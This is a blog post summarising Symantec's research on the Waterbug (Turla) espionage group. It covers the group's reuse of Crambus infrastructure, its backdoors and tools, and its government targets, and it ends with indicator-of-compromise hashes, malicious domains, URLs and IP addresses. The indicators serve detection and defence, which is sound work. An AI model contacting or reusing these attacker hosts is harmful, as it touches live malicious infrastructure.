Waterbug APT Hijacking Infrastructure of Crambus APT group

Waterbug APT Group (aka Turla) is using hijacked infrastructure of Crambus APT (aka OilRig, APT34) group to attack governments and international organizations. According to the Symantec report published on 20 Jun, 2019 Waterbug APT group has been targeting governments and International Organizations since early 2018.  Waterbug targets Europe, Latin America, Middle East and South Asia.

Waterbug APT Group is targeting Governments and International Organisations in multiple (3 waves) campaigns. In the first campaign Waterbug APT group is using a backdoor named Neptune (Backdoor.Whisperer) to target Microsoft Exchange servers. Neptune is installed on Microsoft Exchange servers and can passively listen commands from attackers. Neptun also capable of downloading additional tools, upload stolen files, and execute shell commands. In the second campaign Waterbug APT group had used modified version of Meterpreter backdoor. In the third campaign Waterbug APT group uses custom RPC backdoor.

Waterbug APT group uses new tools like new custom malware, modified hacking tools etc.  Symantec reports “Aside from new tools already mentioned above, Waterbug has also deployed:

1.      A new custom dropper typically used to install Neptun as a service.

2.      A custom hacking tool that combines four leaked Equation Group tools (EternalBlue, EternalRomance, DoublePulsar, SMBTouch) into a single executable.

3.      A USB data collecting tool that checks for a connected USB drive and steals certain file types, encrypting them into a RAR file. It then uses WebDAV to upload to a Box cloud drive.

4.      Visual Basic scripts that perform system reconnaissance after initial infection and then send information to Waterbug command and control (C&C) servers.

5.      PowerShell scripts that perform system reconnaissance and credential theft from Windows Credential Manager and then send this information back to Waterbug C&Cs.

6.      Publicly available tools such as IntelliAdmin to execute RPC commands, SScan and NBTScan for network reconnaissance, PsExec for execution and lateral movement, and Mimikatz (Hacktool.Mimikatz) for credential theft, and Certutil.exe to download and decode remote files. These tools were identified being downloaded via Waterbug tools or infrastructure. “

As per Symantec report Waterbug APT group hijacked infrastructure from the Crambus APT group. Symantec reports also states that Waterbug APT group and Crambus APT group are from different nation, they may be collaborating together. But Symantec fails to give any evidence to support this argument. During this attack campaigns Mimikatz tools was downloaded to victim’s network via Powruner tool and the Poison Frog control panel from Crambus network infrastructure.

As per Symantec believe the heavily modified Mimikatz tool  belongs to the Waterbug APT group. “Symantec believes that the variant of Mimikatz used in this attack is unique to Waterbug. It was heavily modified, with almost all original code stripped out aside from its sekurlsa::logonpasswords credential stealing feature. Waterbug has frequently made extensive modifications to publicly available tools, something Crambus is not well known for.” Symantec report. 

Symantec says that Victim’s computer network was also attacked by a tool IntelliAdmin. IntelliAdmin tool was previous used by Crambus APT group. So from this we may conclude that Waterbug APT group may have hijacked the infrastructure of Crambus APT group.

Who are the targets of this campaign?

1.    The Ministry of Foreign Affairs of a Latin American country

2.      The Ministry of Foreign Affairs of a Middle Eastern country

3.      The Ministry of Foreign Affairs of a European country

4.      The Ministry of the Interior of a South Asian country

5.      Two unidentified government organizations in a Middle Eastern country

6.      One unidentified government organization in a Southeast Asian country

7.      A government office of a South Asian country based in another country

8.      An information and communications technology organization in a Middle Eastern country

9.    Two information and communications technology organizations in two European countries

10.   An information and communications technology organization in a South Asian country

11.   A multinational organization in a Middle Eastern country

12.   An educational institution in a South Asian country

Indicators of Compromise

Campaign 1

24fe571f3066045497b1d8316040734c81c71dcb1747f1d7026cda810085fad7
66893ab83a7d4e298720da28cd2ea4a860371ae938cdd86035ce920b933c9d85 7942eee31d8cb1c8853ce679f686ee104d359023645c7cb808361df791337145
7bd3ff9ba43020688acaa05ce4e0a8f92f53d9d9264053255a5937cbd7a5465e
a1d9f5b9ca7dda631f30bd1220026fc8c3a554d61db09b5030b8eb9d33dc9356
c63f425d96365d906604b1529611eefe5524432545a7977ebe2ac8c79f90ad7e
cb7ecd6805b12fdb442faa8f61f6a2ee69b8731326a646ba1e8886f0a5dd61e0
db9902cb42f6dc9f1c02bd3413ab3969d345eb6b0660bd8356a0c328f1ec0c07
e0c316b1d9d3d9ec5a97707a0f954240bbc9748b969f9792c472d0a40ab919ea
e0c316b1d9d3d9ec5a97707a0f954240bbc9748b969f9792c472d0a40ab919ea
5da013a64fd60913b5cb94e85fc64624d0339e09d7dce25ab9be082f0ca5e38b
c8a864039f4d271f4ab6f440cbc14dffd8c459aa3af86f79f0619a13f67c309f
588fd8eba6e62c28a584781deefe512659f6665daeb8c85100e0bf7a472ad825
cda5b20712e59a6ba486e55a6ab428b9c45eb8d419e25f555ae4a7b537fc2f26
694d9c8a1f0563c08e0d3ab7d402ffbf5a0fa11340c50fba84d709384ccef021
caaed70daa7832952ae93f41131e74dcb6724bb8669d18f28fbed4aa983fdc0c
493eee2c55810201557ef0e5d134ca0d9569f25ae732df139bb0cb3d1478257f
0e9c3779fece579bed30cb0b7093a962d5de84faa2d72e4230218d4a75ee82bc
5bbeed53aaa40605aabbfde31cbfafd5b92b52720e05fa6469ce1502169177a0
d153e4b8a11e2537ecf99aec020da5fad1e34bbe79f617a3ee5bc0b07c3abdca

vision2030.tk
vision2030.cf
dubaiexpo2020.cf
microsoft.updatemeltdownkb7234.com
codewizard.ml
updatenodes.site

https://vision2030.tk/static/googleupdate.txt
https://dubaiexpo2020.cf/counter.aspx
https://microsoft.updatemeltdownkb7234.com/windows/update.aspx
https://codewizard.ml/productivity/update.aspx

Campaign 2

10d1bfd5e8e1c8fa75756a9f1787c3179da9ab338a476f1991d9e300c6186575
3fbec774da2a145974a917aeb64fc389345feb3e581b46d018077e28333601a5
52169d7cdd01098efdde4da3fb22991aaa53ab9e02db5d80114a639bf65bce39
56098ed50e25f28d466be78a36c643d19fedc563a2250ae86a6d936318b7f57e
595a54f0bbf297041ce259461ae8a12f37fb29e5180705eafb3668b4a491cecc
5dc26566b4dec09865ea89edd4f9765ef93e789870ed4c25fcc4ebad19780b40
6b60b27385738cac65584cf7d486913ff997c66d97a94e1dde158c9cd03a4206
846a95a26aac843d1fcec51b2b730e9e8f40032ee4f769035966169d68d144c4
c4a6db706c59a5a0a29368f80731904cc98a26e081088e5793764a381708b1ea
d0b99353cb6500bb18f6e83fe9eed9ce16e5a8d5b940181e5eafd8d82f328a59
ee7f92a158940a0b5d9b902eb0ed9a655c7e6ba312473b1e2c9ef80d58baa6dd

94.249.192.182

Campaign 3

454e6c3d8c1c982cd301b4dd82ec3431935c28adea78ed8160d731ab0bed6cb7
4ecb587ee9b872747408c00de5619cb6b973e7d39ce4937655c5d1a07b7500fc
528e2567e24809d2d0ba96fd70e41d71c18152f0f0c4f29ced129ed7701fa42a
6928e212874686d29c85eac72553ccdf89aacb475c61fa3c086c796df3ab5940
b22bbda8f504f8cced886f566f954cc245f3e7c205e57139610bbbff0412611c
d52b08dd27f2649bad764152dfc2a7dea0c8894ce7c20b51482f4a4cf3e1e792
e7e41b3d7c0ee2d0939bb56d797eaf2dec44516ba54b8bf1477414b03d4d6e48
ec3da59d4a35941f6951639d81d1c5ff73057d9cf779428d80474e9656db427c
fbefe503d78104e04625a511528584327ac129c3436e4df09f3d167e438a1862

markham-travel.com
zebra.wikaba.com
185.141.62.32
212.21.52.110

To read the full report please visit
https://www.symantec.com/blogs/threat-intelligence/waterbug-espionage-governments